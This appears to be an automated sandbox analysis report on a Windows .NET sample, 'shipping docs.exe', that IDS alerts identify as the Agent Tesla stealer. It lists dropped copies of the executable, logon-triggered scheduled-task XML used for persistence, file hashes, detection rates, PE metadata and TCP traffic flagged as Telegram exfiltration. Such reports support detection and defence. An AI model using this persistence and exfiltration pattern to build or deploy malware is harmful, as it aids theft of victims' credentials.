                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                                            MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                                            SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                                            SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                                            SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shipping docs.exe.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\shipping docs.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.355304211458859
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                                            MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                                            SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                                            SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                                            SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                                            Malicious:true
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yVGAJfiVEvtg.exe.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.355304211458859
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                                            MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                                            SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                                            SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                                            SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                            C:\Users\user\AppData\Local\Temp\tmp3418.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1645
                                                                                            Entropy (8bit):5.196605565254392
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
                                                                                            MD5:FD5E93C3EBB783A2036F64992EA982BD
                                                                                            SHA1:3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
                                                                                            SHA-256:9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
                                                                                            SHA-512:0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                                                            C:\Users\user\AppData\Local\Temp\tmp7934.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\shipping docs.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1645
                                                                                            Entropy (8bit):5.196605565254392
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
                                                                                            MD5:FD5E93C3EBB783A2036F64992EA982BD
                                                                                            SHA1:3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
                                                                                            SHA-256:9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
                                                                                            SHA-512:0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
                                                                                            Malicious:true
                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                                                            C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1645
                                                                                            Entropy (8bit):5.196605565254392
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
                                                                                            MD5:FD5E93C3EBB783A2036F64992EA982BD
                                                                                            SHA1:3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
                                                                                            SHA-256:9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
                                                                                            SHA-512:0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                                                            C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\shipping docs.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):606720
                                                                                            Entropy (8bit):7.88879203859592
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
                                                                                            MD5:6308AE755A893C15A989B1CCF2C56393
                                                                                            SHA1:00ADA70AA14A5CF26A7F8CECBAAA437267D30A2A
                                                                                            SHA-256:9DFDB5048599B1083FE534CF5FE5A0440D71EB74B5497E506F0A0A4C23821F40
                                                                                            SHA-512:E03EAC82BF4174912D63CB8ECEED393320FE957F7A735FF0F720FBF558F9638E6FC051CB80607864CAAA8366CA0EDC2D44028367EF97D8020AD7B6F45EADDCD3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@..................................N..W....`.. ............................................................................ ............... ..H............text........ ...0.................. ..`.rsrc... ....`.......2..............@..@.reloc...............@..............@..B.................N......H............U......4...X...(^..........................................z.(......}.....( ...o!...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s".

                                                                                            C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\shipping docs.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                            C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\shipping docs.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):606720
                                                                                            Entropy (8bit):7.88879203859592
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
                                                                                            MD5:6308AE755A893C15A989B1CCF2C56393
                                                                                            SHA1:00ADA70AA14A5CF26A7F8CECBAAA437267D30A2A
                                                                                            SHA-256:9DFDB5048599B1083FE534CF5FE5A0440D71EB74B5497E506F0A0A4C23821F40
                                                                                            SHA-512:E03EAC82BF4174912D63CB8ECEED393320FE957F7A735FF0F720FBF558F9638E6FC051CB80607864CAAA8366CA0EDC2D44028367EF97D8020AD7B6F45EADDCD3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@..................................N..W....`.. ............................................................................ ............... ..H............text........ ...0.................. ..`.rsrc... ....`.......2..............@..@.reloc...............@..............@..B.................N......H............U......4...X...(^..........................................z.(......}.....( ...o!...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s".

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.88879203859592
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:shipping docs.exe
                                                                                            File size:606720
                                                                                            MD5:6308ae755a893c15a989b1ccf2c56393
                                                                                            SHA1:00ada70aa14a5cf26a7f8cecbaaa437267d30a2a
                                                                                            SHA256:9dfdb5048599b1083fe534cf5fe5a0440d71eb74b5497e506f0a0a4c23821f40
                                                                                            SHA512:e03eac82bf4174912d63cb8eceed393320fe957f7a735ff0f720fbf558f9638e6fc051cb80607864caaa8366ca0edc2d44028367ef97d8020ad7b6f45eaddcd3
                                                                                            SSDEEP:12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
                                                                                            TLSH:D9D4023C224ABE2FC6BC99B958D296006FF1CD4D6110EF396EEE21D957CB3382741592
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@................................

                                                                                            File Icon

                                                                                            Icon Hash:828282a28c323068

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x494eee
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x638455A2 [Mon Nov 28 06:30:58 2022 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x94e940x57.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000xc20.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000x92ef40x93000False0.8968630420918368data7.898839095668671IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x960000xc200xe00False0.5340401785714286data5.558555904519806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x980000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0x960e80x7a7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                            RT_GROUP_ICON0x968900x14data
                                                                                            RT_VERSION0x968a40x37cdata

                                                                                            Imports

                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            192.168.2.3149.154.167.220496994432851779 11/29/22-21:19:34.793087TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49699443192.168.2.3149.154.167.220
                                                                                            192.168.2.3149.154.167.220497004432851779 11/29/22-21:20:32.964256TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49700443192.168.2.3149.154.167.220
                                                                                            192.168.2.3149.154.167.220497014432851779 11/29/22-21:20:48.592868TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49701443192.168.2.3149.154.167.220

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 29, 2022 21:19:34.306422949 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.306468010 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.306538105 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.350533009 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.350590944 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.426537037 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.426740885 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.431344986 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.431368113 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.431643009 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.495279074 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.762609005 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.762672901 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.789762020 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.792854071 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.792897940 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.934180021 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.934380054 CET44349699149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:19:34.934495926 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:19:34.941884995 CET49699443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.434153080 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.434236050 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:32.434340954 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.453962088 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.454035997 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:32.529711962 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:32.529877901 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.532382011 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.532432079 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:32.532835007 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:32.640913963 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.929069042 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.929147959 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:32.956907034 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:32.963989973 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:32.964052916 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:33.190849066 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:33.191063881 CET44349700149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:33.191247940 CET49700443192.168.2.3149.154.167.220
